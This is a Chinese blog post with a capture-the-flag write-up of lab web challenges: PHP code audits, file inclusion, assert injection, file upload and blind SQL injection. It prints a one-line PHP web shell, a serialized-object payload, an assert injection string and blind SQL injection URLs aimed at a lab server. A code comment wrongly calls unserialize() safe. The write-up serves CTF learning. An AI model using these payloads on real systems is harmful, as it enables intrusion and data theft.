<!DOCTYPE html>
<html lang="zh-CN">
<head><meta name="generator" content="Hexo 3.8.0">

    <!--[if lt IE 9]>
        <style>body {display: none; background: none !important} </style>
        <meta http-equiv="Refresh" Content="0; url=//outdatedbrowser.com/" />
    <![endif]-->

<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="format-detection" content="telephone=no">
<meta name="author" content="清风">



<meta name="description" content="title:实验室web date: 2019-07-08 18:42tags: webfriend  代码审计题 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465&amp;lt;?php//include(&quot;./">
<meta property="og:type" content="article">
<meta property="og:title" content="清风的博客">
<meta property="og:url" content="http://yoursite.com/2019/07/08/web/index.html">
<meta property="og:site_name" content="清风的博客">
<meta property="og:description" content="title:实验室web date: 2019-07-08 18:42tags: webfriend  代码审计题 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465&amp;lt;?php//include(&quot;./">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://yoursite.com/2019/07/08/web/0001.png">
<meta property="og:image" content="http://yoursite.com/2019/07/08/web/0002.png">
<meta property="og:image" content="http://yoursite.com/2019/07/08/web/0003.png">
<meta property="og:image" content="http://yoursite.com/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/d9496c42de2a4011baa40ce0133bec6f/clipboard.png">
<meta property="og:image" content="http://yoursite.com/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/b8c4a18095b74330a65471fb75df6f22/clipboard.png">
<meta property="og:image" content="http://yoursite.com/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/ea854ff987794cdaa45351e3a9533c6d/clipboard.png">
<meta property="og:image" content="http://yoursite.com/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/077f8c2cd33f418ba007279cea4347ad/clipboard.png">
<meta property="og:image" content="http://yoursite.com/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/8470c998d4ad41f8aa3bce8931976fec/clipboard.png">
<meta property="og:image" content="http://yoursite.com/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/348f264f93564a76ac45db52412e879b/clipboard.png">
<meta property="og:image" content="http://yoursite.com/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/a89097c22b2047b192ae665a63e8c8ef/clipboard.png">
<meta property="og:image" content="http://yoursite.com/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/f2f1d9b797b74baa9c80f98f65a308c9/clipboard.png">
<meta property="og:image" content="http://yoursite.com/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/6a0ea5531c0e46cf8617f8784c6047ce/clipboard.png">
<meta property="og:image" content="http://yoursite.com/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/2929298c2b0543c99a565cb9e0b1fbe4/clipboard.png">
<meta property="og:image" content="http://yoursite.com/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/6baa2ab9f328467993bd0f01ae1818e4/clipboard.png">
<meta property="og:image" content="http://yoursite.com/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/ea7b46ff7c4541cb924f4bd4b84491cc/clipboard.png">
<meta property="og:image" content="http://yoursite.com/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/e08852e28b614bc2ba6b9d5e8efc10b3/clipboard.png">
<meta property="og:image" content="http://yoursite.com/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/6f0b06ad7f5c4f3084a99c63d3f8507a/clipboard.png">
<meta property="og:image" content="http://yoursite.com/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/7dc7101b858746a888ecf05101a72615/clipboard.png">
<meta property="og:image" content="http://yoursite.com/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/f40f4d6762fb49c6b531db6e8e23106f/clipboard.png">
<meta property="og:image" content="http://yoursite.com/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/d8c8344299ad40b9a21cc377bb5fa803/clipboard.png">
<meta property="og:image" content="http://yoursite.com/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/ebff61f6ffc348c088cb7415f4a088a5/clipboard.png">
<meta property="og:image" content="http://yoursite.com/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/676ce34c33f94dcb914ecf3a13a09125/clipboard.png">
<meta property="og:image" content="http://yoursite.com/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/5d44b18fc90b4b21b811c796f776a72d/clipboard.png">
<meta property="og:image" content="http://yoursite.com/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/30e0709e1ef0414ea29b2dfb069402b2/clipboard.png">
<meta property="og:image" content="http://yoursite.com/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/8972702248c8475c96cba0502fbf0b9e/clipboard.png">
<meta property="og:image" content="http://yoursite.com/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/e20e12edcd004f68944fa40f086fd349/clipboard.png">
<meta property="og:image" content="http://yoursite.com/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/3f50e6a82a824c4ab87720c39aee78a9/clipboard.png">
<meta property="og:image" content="http://yoursite.com/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/41fe368ef9be48258058fd78392950d8/clipboard.png">
<meta property="og:image" content="http://yoursite.com/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/e04d1b2d84f04a7fb1210f8c9f7f20ef/clipboard.png">
<meta property="og:image" content="http://yoursite.com/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/0c15342b41504edc903404002685e211/clipboard.png">
<meta property="og:updated_time" content="2019-07-08T10:43:41.824Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="清风的博客">
<meta name="twitter:description" content="title:实验室web date: 2019-07-08 18:42tags: webfriend  代码审计题 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465&amp;lt;?php//include(&quot;./">
<meta name="twitter:image" content="http://yoursite.com/2019/07/08/web/0001.png">

<link rel="apple-touch-icon" href="/apple-touch-icon.png">


    <link rel="alternate" href="/atom.xml" title="清风的博客" type="application/atom+xml">



    <link rel="shortcut icon" href="/favicon.png">



    <link href="//cdn.bootcss.com/animate.css/3.5.1/animate.min.css" rel="stylesheet">



    <link href="//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.css" rel="stylesheet">



    <script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
    <link href="//cdn.bootcss.com/pace/1.0.2/themes/blue/pace-theme-minimal.css" rel="stylesheet">


<link rel="stylesheet" href="/css/style.css">



<link href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet">


<title>清风的博客</title>

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

<script>
    var yiliaConfig = {
        fancybox: true,
        animate: true,
        isHome: false,
        isPost: true,
        isArchive: false,
        isTag: false,
        isCategory: false,
        fancybox_js: "//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.js",
        scrollreveal: "//cdn.bootcss.com/scrollReveal.js/3.1.4/scrollreveal.min.js",
        search: 
    }
</script>


    <script> yiliaConfig.jquery_ui = [false]; </script>



    <script> yiliaConfig.rootUrl = "\/";</script>






</head></html>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            <img src="/img/avatar.png" class="animated zoomIn">
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/">清风</a></h1>
        </hgroup>

        
        <p class="header-subtitle">Dandelion</p>
        

        


        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">主页</a></li>
                        
                            <li><a href="/archives/">所有文章</a></li>
                        
                            <li><a href="/tags/随笔">随笔</a></li>
                        
                            <li><a href="/tags/">标签云</a></li>
                        
                            <li><a href="/about/">关于我</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" href="mailto:123@123.com" title="Email"></a>
                            
                                <a class="fa GitHub" href="#" title="GitHub"></a>
                            
                                <a class="fa RSS" href="/atom.xml" title="RSS"></a>
                            
                                <a class="fa 网易云音乐" href="/netease" title="网易云音乐"></a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a class="main-nav-link switch-friends-link" href="https://hexo.io">Hexo</a>
                    
                      <a class="main-nav-link switch-friends-link" href="https://pages.github.com/">GitHub</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://moxfive.xyz/">MOxFIVE</a>
                    
                    </div>
                </section>
                

                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">专注于后台</div>
                </section>
                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页">清风</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                <img src="/img/avatar.png" class="animated zoomIn">
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页">清风</a></h1>
            </hgroup>
            
            <p class="header-subtitle">Dandelion</p>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">主页</a></li>
                
                    <li><a href="/archives/">所有文章</a></li>
                
                    <li><a href="/tags/随笔">随笔</a></li>
                
                    <li><a href="/tags/">标签云</a></li>
                
                    <li><a href="/about/">关于我</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" target="_blank" href="mailto:123@123.com" title="Email"></a>
                            
                                <a class="fa GitHub" target="_blank" href="#" title="GitHub"></a>
                            
                                <a class="fa RSS" target="_blank" href="/atom.xml" title="RSS"></a>
                            
                                <a class="fa 网易云音乐" target="_blank" href="/netease" title="网易云音乐"></a>
                            
                        </ul>
            </nav>
        </header>                
    </div>
    <link class="menu-list" tags="标签" friends="友情链接" about="关于我">
</nav>
      <div class="body-wrap"><article id="post-web" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2019/07/08/web/" class="article-date">
      <time datetime="2019-07-08T10:34:31.473Z" itemprop="datePublished">2019-07-08</time>
</a>


    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy">
    
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <p>title:实验室web</p>
<p>date: 2019-07-08 18:42<br>tags:</p>
<h2 id="web"><a href="#web" class="headerlink" title="web"></a><strong>web</strong></h2><p><strong>friend</strong></p>
<p><img src="/2019/07/08/web/0001.png" alt="img"></p>
<p>代码审计题</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//include("./class.php");</span></span><br><span class="line"></span><br><span class="line">header(<span class="string">"content-type:text/html;charset=utf-8"</span>);</span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">"file"</span>]))&#123;     <span class="comment">//isset检测变量是否设置</span></span><br><span class="line"></span><br><span class="line">​    $file = $_GET[<span class="string">"file"</span>];</span><br><span class="line"></span><br><span class="line">​    <span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">"password"</span>]))&#123;</span><br><span class="line"></span><br><span class="line">​       $password = $_GET[<span class="string">"password"</span>];</span><br><span class="line"></span><br><span class="line">​       <span class="keyword">if</span>(preg_match(<span class="string">"/flag/"</span>,$file))&#123;<span class="comment">//preg_match正则表达式匹配在$file中查找flag</span></span><br><span class="line"></span><br><span class="line">​            <span class="keyword">echo</span> <span class="string">"不能现在就给你flag哦"</span>;</span><br><span class="line"></span><br><span class="line">​            <span class="keyword">exit</span>();  </span><br><span class="line"></span><br><span class="line">​        &#125;<span class="keyword">else</span>&#123;  </span><br><span class="line"></span><br><span class="line">​            <span class="keyword">require_once</span>($file);<span class="comment">//[require_once](http://www.php.cn/wiki/141.html) 语句和 require 语句完全相同，唯一区别是 PHP 会检查该文件是否已经被包含过，如果是则不会再次包含</span></span><br><span class="line"></span><br><span class="line">​            highlight_file(<span class="string">"$file"</span>);<span class="comment">//highlight_file() 函数对文件进行语法高亮显示</span></span><br><span class="line"></span><br><span class="line">​            $password = unserialize($password);<span class="comment">//unserialize() 提供过滤的特性，可以防止非法数据进行代码注入，提供了更安全的反序列化数据</span></span><br><span class="line"></span><br><span class="line">​            <span class="keyword">echo</span> $password;</span><br><span class="line"></span><br><span class="line">​        &#125;</span><br><span class="line"></span><br><span class="line">​    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line"></span><br><span class="line">​        <span class="keyword">echo</span> <span class="string">"需要密码的！&lt;br&gt;"</span>;</span><br><span class="line"></span><br><span class="line">​    &#125;</span><br><span class="line"></span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line"></span><br><span class="line">​    highlight_file(<span class="string">'./index.php'</span>);</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(preg_match(<span class="string">"/flag/"</span>,$file))&#123; </span><br><span class="line"></span><br><span class="line">​    <span class="keyword">echo</span> <span class="string">"不能现在就给你flag哦"</span>;</span><br><span class="line"></span><br><span class="line">​    <span class="keyword">exit</span>();  </span><br><span class="line"></span><br><span class="line">&#125;<span class="keyword">else</span>&#123;  </span><br><span class="line"></span><br><span class="line">​    <span class="keyword">include</span>($file); </span><br><span class="line"></span><br><span class="line">​    $password = unserialize($password); </span><br><span class="line"></span><br><span class="line">​    <span class="keyword">echo</span> $password;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>因为是GET传参所以在地址栏进行代码审计，首先根据题意输入?file=class.php</p>
<p><img src="/2019/07/08/web/0002.png" alt="img"></p>
<p>在其后补充密码得到下面的代码，得到一个flag_good.php,function __tostring输出字符串</p>
<p>file_get_contents() 函数把整个文件读入一个字符串中</p>
<p><img src="/2019/07/08/web/0003.png" alt="img"></p>
<p>在地址栏上输入?file=class.php&amp;password=O:4:”Flag”:1:{s:4:”file”;s:13:”flag_good.php”;}</p>
<p><img src="/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/d9496c42de2a4011baa40ce0133bec6f/clipboard.png" alt="img"></p>
<p>得到good后，查看源代码得到flag    zkctf{132e9a8fcba14cbbaaad09c76d15bd07} </p>
<p><img src="/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/b8c4a18095b74330a65471fb75df6f22/clipboard.png" alt="img"></p>
<p><strong>where is flag</strong></p>
<p><img src="/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/ea854ff987794cdaa45351e3a9533c6d/clipboard.png" alt="img"></p>
<p>本题属于文件包含题，</p>
<p><img src="/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/077f8c2cd33f418ba007279cea4347ad/clipboard.png" alt="img"></p>
<p>得到的编码，使用base64解码，得到flag   zkctf{wuhu_include_lueluelue}</p>
<p><strong>代码审计</strong></p>
<p><img src="/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/8470c998d4ad41f8aa3bce8931976fec/clipboard.png" alt="img"></p>
<?php

include("./flag.php");

show_source(__FILE__);

error_reporting(0);

$a=$_GET['a'];

if(stripos($a,'.'))stripos() 函数查找字符串在另一字符串中第一次出现的位置（不区分大小写）本题是查找“.”在$a中第一次出现的位置

{

​    echo 'Hahahahahaha';

​    die();

}

$data = @file_get_contents($a,'r');file_get_contents() 函数把整个文件读入一个字符串中

if($data=="1433223!!!"){

​    if (isset ($_GET['password']))

​    {ereg()函数用指定的模式搜索一个字符串中指定的字符串,如果匹配成功返回true,否则,则返回false。搜索字母的字符是大小写敏感的

​        if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE){

​            echo 'You password must be alphanumeric';

​        }else if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999){strlen() 函数返回字符串的长度。

​            if (strpos ($_GET['password'], '-') !== FALSE)

​            {

​                die('Flag: ' . $flag);

​            }else{

​                echo('- have not been found');

​            }

​        }else{

​            echo 'Invalid password';

​        }

​    }

}else{

​    echo 'Unhappy!';

}

?><p>对于data，a用PHP伪协议php://input即可，它过滤了’.’，估计是不能用文件包含的，所以我们要用php伪协议post一个Data，    password只能是字符串和数字，字符串的长度要小于8，值要大于9999999，因此要使用科学计数法所以1e8，2e8等等，password中必须要有’-‘,这是就要使用%00截断 ，最后得到flag：zkctf{the_ Code_audit_is_so_fun}</p>
<p><img src="/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/348f264f93564a76ac45db52412e879b/clipboard.png" alt="img"></p>
<p><strong>wramup</strong></p>
<p><img src="/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/a89097c22b2047b192ae665a63e8c8ef/clipboard.png" alt="img"></p>
<p>打开题目地址得到一个haha….，</p>
<p><img src="/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/f2f1d9b797b74baa9c80f98f65a308c9/clipboard.png" alt="img"></p>
<p>点击右键查看源代码，有一个index.phps</p>
<p><img src="/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/6a0ea5531c0e46cf8617f8784c6047ce/clipboard.png" alt="img"></p>
<p>在地址栏后输入index.phps，得到PHP代码</p>
<p><img src="/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/2929298c2b0543c99a565cb9e0b1fbe4/clipboard.png" alt="img"></p>
<p>assert — 检查一个断言是否为 FALSE    assert() 会检查指定的 assertion 并在结果为 FALSE 时采取适当的行动如果 assertion 是字符串，它将会被 assert() 当做 PHP 代码来执行。 assertion 是字符串的优势是当禁用断言时它的开销会更小，并且在断言失败时消息会包含 assertion 表达式。</p>
<p>a=highlight_file()用高亮显示flag.php，用//注释掉（==$b）</p>
<p>?b=Hello%20word!&amp;a=highlight_file(%27flag.php%27);//         得到flagzkctf{assert_is_s0_co01}</p>
<p><img src="/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/6baa2ab9f328467993bd0f01ae1818e4/clipboard.png" alt="img"></p>
<p><strong>upload</strong></p>
<p><img src="/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/ea7b46ff7c4541cb924f4bd4b84491cc/clipboard.png" alt="img"></p>
<p>打开题目地址，得到下面一个网页</p>
<p><img src="/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/e08852e28b614bc2ba6b9d5e8efc10b3/clipboard.png" alt="img"></p>
<p>首先想要的到东西，就要使用菜刀来链接，先准备一个一句话木马的病毒</p>
<?php @eval($_POST['aaa']);?><p>文件名设为1.php</p>
<p>打开菜刀，点击右键选择添加，输入以下内容，最后点击添加</p>
<p><img src="/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/6f0b06ad7f5c4f3084a99c63d3f8507a/clipboard.png" alt="img"></p>
<p>连接成功后，在数据库中查找flag</p>
<p><img src="/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/7dc7101b858746a888ecf05101a72615/clipboard.png" alt="img"></p>
<p>最后的到flag     zkctf{Find_Hide_oN_The_Upl0ad}</p>
<p><img src="/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/f40f4d6762fb49c6b531db6e8e23106f/clipboard.png" alt="img"></p>
<p><strong>sql-2</strong></p>
<p><img src="/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/d8c8344299ad40b9a21cc377bb5fa803/clipboard.png" alt="img"></p>
<p>打开题目地址，发现就只有一句话Try id!，查看源代码发现也是这句话</p>
<p><img src="/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/ebff61f6ffc348c088cb7415f4a088a5/clipboard.png" alt="img"></p>
<p>在地址栏输入?id=1’ –+  得到下图的一段话，发现是盲注，只要是对的就会出现下面一段话，否则为空白页面</p>
<p><img src="/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/676ce34c33f94dcb914ecf3a13a09125/clipboard.png" alt="img"></p>
<p><img src="/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/5d44b18fc90b4b21b811c796f776a72d/clipboard.png" alt="img"></p>
<p><img src="/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/30e0709e1ef0414ea29b2dfb069402b2/clipboard.png" alt="img"></p>
<p><img src="/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/8972702248c8475c96cba0502fbf0b9e/clipboard.png" alt="img"></p>
<p><a href="http://47.99.176.38:5010/web9/?id=1%27%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))%3E80--+" target="_blank" rel="noopener">http://47.99.176.38:5010/web9/?id=1%27%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))%3E80--+</a></p>
<p><img src="/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/e20e12edcd004f68944fa40f086fd349/clipboard.png" alt="img"></p>
<p><a href="http://47.99.176.38:5010/web9/?id=1%27and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1),2,1))%3E113--+" target="_blank" rel="noopener">http://47.99.176.38:5010/web9/?id=1%27and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1),2,1))%3E113--+</a></p>
<p><img src="/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/3f50e6a82a824c4ab87720c39aee78a9/clipboard.png" alt="img"></p>
<p><a href="http://47.99.176.38:5010/web9/?id=1%27and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1),2,1))%3E113--+" target="_blank" rel="noopener">http://47.99.176.38:5010/web9/?id=1%27and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1),2,1))%3E113--+</a></p>
<p><img src="/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/41fe368ef9be48258058fd78392950d8/clipboard.png" alt="img"></p>
<p><a href="http://47.99.176.38:5010/web9/?id=1%27%20and%201=(select%201%20from%20information_schema.columns%20where%20table_name=%27user%27%20and%20table_name%20regexp%20%27^us[a-z]%27%20limit%200,1)--+" target="_blank" rel="noopener">http://47.99.176.38:5010/web9/?id=1%27%20and%201=(select%201%20from%20information_schema.columns%20where%20table_name=%27user%27%20and%20table_name%20regexp%20%27^us[a-z]%27%20limit%200,1)--+</a></p>
<p><img src="/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/e04d1b2d84f04a7fb1210f8c9f7f20ef/clipboard.png" alt="img"></p>
<p><a href="http://47.99.176.38:5010/web9/?id=1%27%20and%201=(select%201%20from%20information_schema.columns%20where%20table_name=%27user%27%20and%20column_name%20regexp%20%27^user%27%20limit%200,1)--+" target="_blank" rel="noopener">http://47.99.176.38:5010/web9/?id=1%27%20and%201=(select%201%20from%20information_schema.columns%20where%20table_name=%27user%27%20and%20column_name%20regexp%20%27^user%27%20limit%200,1)--+</a></p>
<p><img src="/2019/07/08/web/Users/ASUS/AppData/Local/YNote/data/qqF36D1E1502E6123895D932E20835BB53/0c15342b41504edc903404002685e211/clipboard.png" alt="img"></p>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2019/07/08/web/"></a></p>
        <p><span>文章作者:</span><a href="/" title="回到主页">清风</a></p>
        <p><span>发布时间:</span>2019-07-08, 18:34:31</p>
        <p><span>最后更新:</span>2019-07-08, 18:43:41</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2019/07/08/web/" title>http://yoursite.com/2019/07/08/web/</a>
            <span class="copy-path" data-clipboard-text="原文: http://yoursite.com/2019/07/08/web/　　作者: 清风" title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" title="CC BY-NC-SA 4.0 International" target="_blank">"署名-非商用-相同方式共享 4.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



    <nav id="article-nav">
        
            <div id="article-nav-newer" class="article-nav-title">
                <a href="/2019/09/28/bugku-web-web2/">
                    bugku_web_web2
                </a>
            </div>
        
        
            <div id="article-nav-older" class="article-nav-title">
                <a href="/2019/06/13/ISCC-1/">
                    ISCC
                </a>
            </div>
        
    </nav>

  
</article>

    <div id="toc" class="toc-article">
        <strong class="toc-title">文章目录</strong>
        
